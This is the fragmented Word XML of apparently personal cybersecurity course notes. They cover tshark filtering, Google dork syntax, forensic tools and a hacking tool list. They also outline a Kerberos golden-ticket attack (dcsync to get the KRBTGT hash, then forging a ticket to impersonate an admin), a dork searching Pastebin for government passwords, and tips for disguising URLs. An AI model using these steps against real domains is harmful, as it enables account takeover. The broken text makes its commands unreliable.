      <w:proofErr w:type="spellStart"/>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 there</w:t>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request.uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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gif” – search for specific word inside http protocol</w:t>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flag.syn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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flag.ack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 shows all the packets that syn is defined but ack does not, which happen when someone scanning ports</w:t>
      </w:r>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ot </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>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p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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kets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F00461"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88989"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46500"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9B186"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262D5"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EC042"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74C57"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AB866"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A1A1C"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9CFAD"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F21F5"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EE357"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1C594"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64A14"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180BB"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09916"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A714E"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C23E8" w14:textId="13C3E844" w:rsidR="00847C8A" w:rsidRPr="00C97ECA" w:rsidRDefault="00847C8A" w:rsidP="00847C8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shark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F7DDB" w14:textId="440141B0" w:rsidR="00847C8A" w:rsidRDefault="00660D7F"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CLI for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use it for make automations or search for thing more easily.</w:t>
      </w:r>
      <w:r w:rsidR="007710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hen hardening to find the right filter, you can use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007710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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007710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hoose the wanted field, choose “use as filter” and you will see the syntax, th</w:t>
      </w:r>
      <w:r w:rsidR="00ED03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you can write this filter in -Y flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473CC2B4" w14:textId="2E12FF44" w:rsidR="00DE0241" w:rsidRDefault="00E957E7"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eth0 – capture packets (you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in this terminal during this time)</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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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eth0 -w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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the amount of packets it captured and write it to this file</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 – flag for sniff packets</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 – flag for use exist file of packets</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Y/--display-filter - -Y is a shorthand of --display-filter, it filter as the syntax of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 – flag for get certain field inside the packets</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z – flag for the statistics of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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port-objects – flag for extract files</w:t>
      </w:r>
      <w:r w:rsidR="00CF6E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 fields – for specify </w:t>
      </w:r>
      <w:r w:rsidR="00115F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ype of info</w:t>
      </w:r>
      <w:r w:rsidR="00115F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 – for name the field, type -e for every field</w:t>
      </w:r>
      <w:r w:rsidR="00390A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 – shows the header of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00390A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e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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10.10.10 &amp;&amp; http’ – the flag -r for open the file, and the flag -Y for filter to this source </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ttp protocol</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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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http’ -T fields -e ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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lter for http packets and get only their </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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rt-objects </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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files_http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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the files that received in http protocol and save them inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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s_http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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number</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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1” -T fields -e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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dstport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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p.dstport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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or frame 161 and print the destination </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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s</w:t>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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the statistics of conversations, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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p>
    <w:p w14:paraId="46F89160" w14:textId="1C36DF15" w:rsidR="0080350A" w:rsidRDefault="00A27EB3"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pcap</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fields -e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addr</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sed ‘s/,/ /g’ | awk ‘{for(</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NF;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t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rt |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s all the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src</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dst</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groups of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src,eth.dst</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the sed switch the , in space, and the awk make all the two columns to one column, and the sort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 the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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hernet addresses in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D46935" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRPr="009D0E12" w:rsidRDefault="009C77E4"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90DAF" w14:textId="622ACA55" w:rsidR="0080350A" w:rsidRPr="00294C81" w:rsidRDefault="00294C81" w:rsidP="00294C8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dorks syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B98E2A7" w14:textId="77777777" w:rsidR="00090CBC" w:rsidRDefault="0080350A"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type: csv site: za budget – search for csv files from za area that has connection to the word “budget”, there is not : before the word “budget” so it make free search on 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ite: Pastebin.com intext </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v.il passwords – search in the site Pastebin.com words in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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gov.il passwords.</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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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title – search inside title</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iletype – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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csv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D6ACC"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3F6B0"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008CC"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A36D1" w14:textId="77777777" w:rsidR="00DE253C" w:rsidRDefault="00DE253C"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CD7AF" w14:textId="1FF4A8BE" w:rsidR="00DE253C" w:rsidRPr="00294C81" w:rsidRDefault="00DE253C" w:rsidP="00DE253C">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ing Golden Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18493C76" w14:textId="3DA7F201" w:rsidR="00A42FA5" w:rsidRDefault="00DE253C"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reate golden ticket we need 3 </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Domain Name</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SID</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 KRBTGT hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D349EB4" w14:textId="54F7F449" w:rsidR="00702525" w:rsidRDefault="00702525" w:rsidP="0070252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btgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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a default service account i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rosoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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i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ctory used by the Kerberos Key Distribution Center (KDC) service. This account's primary function is to sign and encrypt Ticket Granting Tickets (TGTs) used within the Kerberos authentication proce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64511" w14:textId="7CB14D9E" w:rsidR="00A42FA5" w:rsidRDefault="00A42FA5"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get domain name we can us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o get SID w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use 2 ways, but we need session to the machine for tha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e can run the command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ami</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and find the S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r we can us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 to use kiwi commands, firstly we need to write “load kiwi” to load kiwi commands, then us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sync_ntlm</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btg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will find in the output the SID, also the third thing we looked for, the NTLM hash.</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 by running the next command we can create the golden tick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ke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er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hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FA6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omain-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FA6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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FA6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 -domain … hack3r -dc-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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 – we need the insert the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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found, the SID we found, the name of the domain, the user</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ant to impersonate to (we can choose any exist user and we will prefer high privilege user as admin)</w:t>
      </w:r>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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DC</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07DB14"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3BF58"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2B394"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E4B6"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5F400"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E72C7"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AA8CD"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E2590D"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5D90C"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66EA8"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A886E"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1045D"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B5943"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8169F"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43868" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRPr="00A42FA5"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7D33A" w14:textId="3ACF1CCA" w:rsidR="00585246" w:rsidRDefault="00772D97" w:rsidP="00601DF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EEF14B0" w14:textId="2B1569E5" w:rsidR="00585246" w:rsidRPr="00294C81" w:rsidRDefault="00585246" w:rsidP="00585246">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ols  information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54598F28"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Forensic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mmon tool to investigate files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD5DBC8"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miner</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ood tool for investigat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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495D50DC"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TK imager – you can load to this tool file or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md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and investigate them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB03C9E" w14:textId="2467BD1F"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xD</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ou can load files to this tool and investigate fi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trl + G/F – for search inside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You can use the tool for change headers/trailers then open file you could not before, sometimes you need to change the extension of the file in the name accordingly, windows know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ind a file by the extension name in the contrary of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possible to use the tool for search files inside the original file, as pdf files and more, find the blocks of header and trailer, copy all the blocks between them to new file and call this file with the appropriate extension then you could open the “hidden” file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019617A3" w14:textId="754ED532" w:rsidR="00D360F5" w:rsidRDefault="00585246"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w:t>
      </w:r>
      <w:r w:rsidR="00D360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er – you can see all kind of activities that happen on the machine, we use that for watch on anomaly in the networ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urity field</w:t>
      </w:r>
      <w:r w:rsidR="00D360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most used, a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security stuff as log of users, when user fail to log, add user to domain, and more.</w:t>
      </w:r>
      <w:r w:rsidR="008935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use ctrl + f to search for strings (search even inside the events)</w:t>
      </w:r>
      <w:r w:rsidR="008935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also filter option of the tool to search for certain id event and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A34AF3A" w14:textId="77777777" w:rsidR="002D17B5" w:rsidRDefault="00D360F5"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ecurity Policy – the place we define which kind of actions will appear in event viewer, we want the less we can for there will not be too much noise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7459B7" w14:textId="77777777" w:rsidR="002D17B5" w:rsidRDefault="002D17B5"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View</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tool that help us to find if a file packed or encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDAF696" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="002D17B5"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m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cess monitor, show us software that running on the machine, and resources the software uses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F15EDE4"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C6DCD"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13A13"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94F50"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203CB"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70B1A"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9DF02"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7194C"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D9925"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C88EB"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542C1"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15B71" w14:textId="2F7D6415" w:rsidR="006D0E34" w:rsidRDefault="00772D97"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1A05E09" w14:textId="30083C46" w:rsidR="002D166C" w:rsidRPr="00294C81" w:rsidRDefault="006D0E34" w:rsidP="002D166C">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tra information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A4B571" w14:textId="09806901" w:rsidR="00AD5A99" w:rsidRDefault="00806014"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D5A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user</w:t>
      </w:r>
      <w:r w:rsidR="00AD5A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oot user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE4211B" w14:textId="3FCF809E" w:rsidR="0043077E" w:rsidRDefault="0043077E"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ores temporary fi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me – where all the home directories of all the users are fou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ar – variable data files such log files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ocal system configuration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boot – files required to boo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 – contains a lot of commands as ls, rm and more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F00AD" w14:textId="161C0A13" w:rsidR="005033DB" w:rsidRDefault="005033DB"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uthority/system – the strongest user in windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCF1014" w14:textId="59C4EEF8" w:rsidR="00AD5A99" w:rsidRDefault="00D232DD"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ustotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ou can load file or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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checks it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 if the file found problematic in the pa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ru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ou can scan virus through this site but oppose t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ustota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site is not save what you upload in its DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBBB67F" w14:textId="77777777" w:rsidR="00AD5A99" w:rsidRDefault="006749F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chef</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ite that helps i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ion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bases like from hex to binary, from base 64, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A8226A" w14:textId="77777777" w:rsidR="00AD5A99" w:rsidRDefault="006749F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stati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ite for crack passwords, solve hashes a lot the john does not succeeds (on its default file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49381950" w14:textId="77777777" w:rsidR="0088672A" w:rsidRDefault="00772D9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da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ite for passive scan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its own syntax,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org: and hostname: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obots.txt – prevents index of google.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE18DDF" w14:textId="77777777" w:rsidR="003A3976" w:rsidRDefault="0088672A"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p -I – tool that ask questions as the name of the dog and more for creates possible passwords, for install in you need to writ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enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2282A361" w14:textId="206C9C13" w:rsidR="001C0EBD" w:rsidRDefault="001C0EBD"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FatRat – tool for creating payloads, it also cooperate with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venom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3EB0F085" w14:textId="46CF7A92" w:rsidR="000E13AB" w:rsidRDefault="000E13AB"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berut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ol for exploit the Kerberos protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4334E083" w14:textId="5BF3F7A2" w:rsidR="00D80B1B" w:rsidRDefault="00D80B1B"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ry Kessler – site that shows headers and trailers by type of files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A18A9D1" w14:textId="7C448467" w:rsidR="00585246" w:rsidRDefault="00655DA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nutes mail – site that give you mail to use for 10 minutes, if you want to enter a site without to sign</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32914926" w14:textId="1AE4E311" w:rsidR="00540DD2" w:rsidRDefault="00540DD2"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UR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ite that get as input URL and output tiny URL, reduce the size of URL and enable us to make URL less suspicious</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B54D2B8" w14:textId="65023E98" w:rsidR="00B4458F" w:rsidRDefault="00B4458F"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io – a site that can host out file for temporary time (could use for transfer files between two machines)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6298815D" w14:textId="6C20219C" w:rsidR="00A30CDC" w:rsidRDefault="00A30CDC"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uti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ol that convert exe to bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB83F21" w14:textId="5EF8B1EC" w:rsidR="00A25F69" w:rsidRDefault="00A25F69"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assdoor – anonymous criticism o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ech</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nies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AC08BB" w14:textId="0113DE2F" w:rsidR="00D00FB0" w:rsidRDefault="00D00FB0"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k5 – cool site that contains components for hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B55B29" w14:textId="5975E358" w:rsidR="003D6D1D" w:rsidRDefault="003D6D1D"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dns.info – a site that get as inpu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domain and returns data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780B699B" w14:textId="43B19448" w:rsidR="003D6D1D" w:rsidRDefault="003D6D1D"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orksearch.com </w:t>
      </w:r>
      <w:r w:rsidR="00BD11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11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site that build the query of google dorks by the info you enter him about what you want to find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699C2995" w14:textId="53FE5A6E" w:rsidR="00D00FB0" w:rsidRDefault="00D00FB0"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bit Hole – Ai for hackers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76921AF4" w14:textId="6223F295" w:rsidR="005C6F18" w:rsidRDefault="005C6F18"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trac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ol that can extract all the pages behind a si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rack</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 w:history="1">
        <w:r w:rsidRPr="00F975F8">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ohnbryce.co.il</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ake all the pages behind this site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040D7B18" w14:textId="7DEE9B43" w:rsidR="00C23D7B" w:rsidRDefault="00C23D7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ckbox – investigate as PT and ge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a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ubn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ybox</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vestigate as PT and get mediocre info a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ain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box</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vestigate as PT and get a lot of info, even users sometimes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B34819" w14:textId="2379E350" w:rsidR="0043739B" w:rsidRDefault="0043739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 – search info on internet in bare places (passive investiga</w:t>
      </w:r>
      <w:r w:rsidR="001806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p>
    <w:p w14:paraId="3684E642" w14:textId="751DC585" w:rsidR="00032DDE" w:rsidRDefault="00032DDE"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psuite</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ol for web scanning, you can use also brute force on a site using that tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5F1178" w14:textId="64426AE5" w:rsidR="00A25F69" w:rsidRDefault="00A25F69"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ssus – strong tool that scan similar t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has its advantages and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r w:rsid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spellEnd"/>
    </w:p>
    <w:p w14:paraId="002D4975" w14:textId="39164394" w:rsidR="00685BB6" w:rsidRDefault="00685BB6" w:rsidP="00685BB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ba – meaning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proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50FBD374" w14:textId="7B1ECFCD" w:rsidR="00592E6C" w:rsidRDefault="00592E6C"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 – when using recursion you need to put return sometimes in the right plac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therwise the function can continue again after it reached to the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E29C63" w14:textId="39198618" w:rsidR="00ED15CF" w:rsidRDefault="00ED15CF"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sh</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shel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write it in terminal or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ope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shel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ll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3522FADD" w14:textId="52369397" w:rsidR="009A1845" w:rsidRDefault="009A1845"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fference between portable file or installer file is the installer you are install on the computer what take more time and you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 it with disk on key, and sometimes you don’t have the permissions to install in on the computer, but it found on the computer which have faster abilities and more comfortable to use, on the contrary the portable file is a file that can run without install permissions, and you can pass it on disk on key</w:t>
      </w:r>
      <w:r w:rsidR="000B0A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A4091" w14:textId="23301916" w:rsidR="00897B79" w:rsidRPr="00897B79" w:rsidRDefault="00897B79"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ter inside share directory of windows we can write in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place of path in the directory the path, like smb://10.10.10.10/c$/ then we will need to enter user and password and we can enter the directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0209A199" w14:textId="56554949" w:rsidR="00ED1CCC" w:rsidRDefault="00ED1CCC"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language that web developers are using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5934F748" w14:textId="4C63059E" w:rsidR="00662F80" w:rsidRDefault="00662F80"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BNS,DNS,LLMNR – all of them protocol for name resolution </w:t>
      </w:r>
      <w:r w:rsidR="003618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HCP – contains hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052626AB"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F673F"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FCA5B"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2147A"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70BB1"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D3095" w14:textId="464CD838" w:rsidR="005E279D" w:rsidRPr="00296C76" w:rsidRDefault="0088672A"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3F7FEB0" w14:textId="77777777" w:rsidR="00136837" w:rsidRPr="00136837" w:rsidRDefault="00136837" w:rsidP="00136837">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36837" w:rsidRPr="00136837" w:rsidSect="00E17D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E41"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8308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E4B1C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6474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64AE2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7108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7626D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13060FE0"/>
    <w:lvl w:ilvl="0" w:tplc="985C7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91735B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE58DEBA"/>
    <w:lvl w:ilvl="0" w:tplc="9C18ED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9677258">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1971741777">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="382022606">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="262499376">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1770812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DE"/>
    <w:rsid w:val="000042E7"/>
    <w:rsid w:val="00010244"/>
    <w:rsid w:val="000104DD"/>
    <w:rsid w:val="000120DF"/>
    <w:rsid w:val="000164C5"/>
    <w:rsid w:val="00021236"/>
    <w:rsid w:val="00021B18"/>
    <w:rsid w:val="00024C40"/>
    <w:rsid w:val="00026823"/>
    <w:rsid w:val="00032DDE"/>
    <w:rsid w:val="00042906"/>
    <w:rsid w:val="00045548"/>
    <w:rsid w:val="0005505E"/>
    <w:rsid w:val="00056771"/>
    <w:rsid w:val="0005741C"/>
    <w:rsid w:val="00061C0E"/>
    <w:rsid w:val="00065E66"/>
    <w:rsid w:val="00074A8B"/>
    <w:rsid w:val="000906A3"/>
    <w:rsid w:val="00090CBC"/>
    <w:rsid w:val="00093FDF"/>
    <w:rsid w:val="0009466A"/>
    <w:rsid w:val="000A0D7F"/>
    <w:rsid w:val="000B0A5C"/>
    <w:rsid w:val="000C1525"/>
    <w:rsid w:val="000C387E"/>
    <w:rsid w:val="000D08CD"/>
    <w:rsid w:val="000D0B27"/>
    <w:rsid w:val="000D38A6"/>
    <w:rsid w:val="000D4F85"/>
    <w:rsid w:val="000D61EA"/>
    <w:rsid w:val="000E13AB"/>
    <w:rsid w:val="000E1FB5"/>
    <w:rsid w:val="000E6152"/>
    <w:rsid w:val="000F11FF"/>
    <w:rsid w:val="001038E7"/>
    <w:rsid w:val="00105047"/>
    <w:rsid w:val="00110024"/>
    <w:rsid w:val="00115F48"/>
    <w:rsid w:val="00130E25"/>
    <w:rsid w:val="00131B33"/>
    <w:rsid w:val="00132564"/>
    <w:rsid w:val="00134126"/>
    <w:rsid w:val="00136837"/>
    <w:rsid w:val="001418A0"/>
    <w:rsid w:val="00165101"/>
    <w:rsid w:val="00170589"/>
    <w:rsid w:val="0017417B"/>
    <w:rsid w:val="00180663"/>
    <w:rsid w:val="001A42D8"/>
    <w:rsid w:val="001A6FC4"/>
    <w:rsid w:val="001C0EBD"/>
    <w:rsid w:val="001C5241"/>
    <w:rsid w:val="001D0E2C"/>
    <w:rsid w:val="001E10F4"/>
    <w:rsid w:val="001E4F28"/>
    <w:rsid w:val="001E6FD2"/>
    <w:rsid w:val="001F05FB"/>
    <w:rsid w:val="001F44E7"/>
    <w:rsid w:val="002010E1"/>
    <w:rsid w:val="00201A21"/>
    <w:rsid w:val="002170DA"/>
    <w:rsid w:val="00220A8C"/>
    <w:rsid w:val="00220C1F"/>
    <w:rsid w:val="00227792"/>
    <w:rsid w:val="00233685"/>
    <w:rsid w:val="00255438"/>
    <w:rsid w:val="00260CB4"/>
    <w:rsid w:val="00265644"/>
    <w:rsid w:val="00294C81"/>
    <w:rsid w:val="00296C76"/>
    <w:rsid w:val="00297646"/>
    <w:rsid w:val="002A6727"/>
    <w:rsid w:val="002B6713"/>
    <w:rsid w:val="002C1548"/>
    <w:rsid w:val="002C5B72"/>
    <w:rsid w:val="002C7E3B"/>
    <w:rsid w:val="002D166C"/>
    <w:rsid w:val="002D17B5"/>
    <w:rsid w:val="002D2B47"/>
    <w:rsid w:val="002D35E9"/>
    <w:rsid w:val="002D7121"/>
    <w:rsid w:val="002F0752"/>
    <w:rsid w:val="002F4F3E"/>
    <w:rsid w:val="002F5701"/>
    <w:rsid w:val="002F60DB"/>
    <w:rsid w:val="003000B5"/>
    <w:rsid w:val="00326F43"/>
    <w:rsid w:val="00327EAE"/>
    <w:rsid w:val="00337BF7"/>
    <w:rsid w:val="00340595"/>
    <w:rsid w:val="003467DE"/>
    <w:rsid w:val="00360534"/>
    <w:rsid w:val="003618C0"/>
    <w:rsid w:val="00361DDD"/>
    <w:rsid w:val="0036430B"/>
    <w:rsid w:val="003715FF"/>
    <w:rsid w:val="00371819"/>
    <w:rsid w:val="00372529"/>
    <w:rsid w:val="003728BE"/>
    <w:rsid w:val="003907BC"/>
    <w:rsid w:val="00390A2E"/>
    <w:rsid w:val="0039333C"/>
    <w:rsid w:val="003A088F"/>
    <w:rsid w:val="003A2A80"/>
    <w:rsid w:val="003A3976"/>
    <w:rsid w:val="003A5B81"/>
    <w:rsid w:val="003B1C01"/>
    <w:rsid w:val="003B35C9"/>
    <w:rsid w:val="003C1974"/>
    <w:rsid w:val="003C2A98"/>
    <w:rsid w:val="003D0295"/>
    <w:rsid w:val="003D0B21"/>
    <w:rsid w:val="003D0EAF"/>
    <w:rsid w:val="003D3CFF"/>
    <w:rsid w:val="003D50FC"/>
    <w:rsid w:val="003D5CCB"/>
    <w:rsid w:val="003D6D1D"/>
    <w:rsid w:val="003E0EA2"/>
    <w:rsid w:val="003E0F51"/>
    <w:rsid w:val="00406BD8"/>
    <w:rsid w:val="00407DB3"/>
    <w:rsid w:val="0041017E"/>
    <w:rsid w:val="00412636"/>
    <w:rsid w:val="00425D14"/>
    <w:rsid w:val="00425FB7"/>
    <w:rsid w:val="00426AC0"/>
    <w:rsid w:val="0043077E"/>
    <w:rsid w:val="0043317B"/>
    <w:rsid w:val="0043739B"/>
    <w:rsid w:val="0044046E"/>
    <w:rsid w:val="004456B5"/>
    <w:rsid w:val="00460961"/>
    <w:rsid w:val="00460AF6"/>
    <w:rsid w:val="00461CCA"/>
    <w:rsid w:val="00475987"/>
    <w:rsid w:val="004772A3"/>
    <w:rsid w:val="00480370"/>
    <w:rsid w:val="00495A6E"/>
    <w:rsid w:val="004B172E"/>
    <w:rsid w:val="004B7459"/>
    <w:rsid w:val="004C174E"/>
    <w:rsid w:val="004E119A"/>
    <w:rsid w:val="004E7214"/>
    <w:rsid w:val="005000CB"/>
    <w:rsid w:val="005017A7"/>
    <w:rsid w:val="00502E69"/>
    <w:rsid w:val="005033DB"/>
    <w:rsid w:val="0052648E"/>
    <w:rsid w:val="00531FCC"/>
    <w:rsid w:val="0053370D"/>
    <w:rsid w:val="00540DD2"/>
    <w:rsid w:val="005578F8"/>
    <w:rsid w:val="00563E0A"/>
    <w:rsid w:val="0056512E"/>
    <w:rsid w:val="005675ED"/>
    <w:rsid w:val="005832B0"/>
    <w:rsid w:val="00585246"/>
    <w:rsid w:val="005855F8"/>
    <w:rsid w:val="00586BFC"/>
    <w:rsid w:val="00592E6C"/>
    <w:rsid w:val="00596447"/>
    <w:rsid w:val="005A3156"/>
    <w:rsid w:val="005C2B40"/>
    <w:rsid w:val="005C5093"/>
    <w:rsid w:val="005C6F18"/>
    <w:rsid w:val="005E279D"/>
    <w:rsid w:val="005E6285"/>
    <w:rsid w:val="005E6FE5"/>
    <w:rsid w:val="00601862"/>
    <w:rsid w:val="00601DF1"/>
    <w:rsid w:val="00605A20"/>
    <w:rsid w:val="00613EAF"/>
    <w:rsid w:val="00614931"/>
    <w:rsid w:val="00620850"/>
    <w:rsid w:val="0062161E"/>
    <w:rsid w:val="00623466"/>
    <w:rsid w:val="0062373E"/>
    <w:rsid w:val="00634FC1"/>
    <w:rsid w:val="00647E23"/>
    <w:rsid w:val="0065544A"/>
    <w:rsid w:val="00655DAB"/>
    <w:rsid w:val="00660D7F"/>
    <w:rsid w:val="0066281F"/>
    <w:rsid w:val="00662F80"/>
    <w:rsid w:val="00670C38"/>
    <w:rsid w:val="00672E38"/>
    <w:rsid w:val="006749F7"/>
    <w:rsid w:val="00684BDD"/>
    <w:rsid w:val="00685BB6"/>
    <w:rsid w:val="0069419E"/>
    <w:rsid w:val="00697594"/>
    <w:rsid w:val="00697957"/>
    <w:rsid w:val="006A7925"/>
    <w:rsid w:val="006B420E"/>
    <w:rsid w:val="006C0698"/>
    <w:rsid w:val="006C60E7"/>
    <w:rsid w:val="006C63AB"/>
    <w:rsid w:val="006C7522"/>
    <w:rsid w:val="006D0E34"/>
    <w:rsid w:val="006D297C"/>
    <w:rsid w:val="006D49FC"/>
    <w:rsid w:val="006D75C9"/>
    <w:rsid w:val="006E5D31"/>
    <w:rsid w:val="006F0038"/>
    <w:rsid w:val="006F40E6"/>
    <w:rsid w:val="006F50F4"/>
    <w:rsid w:val="00702525"/>
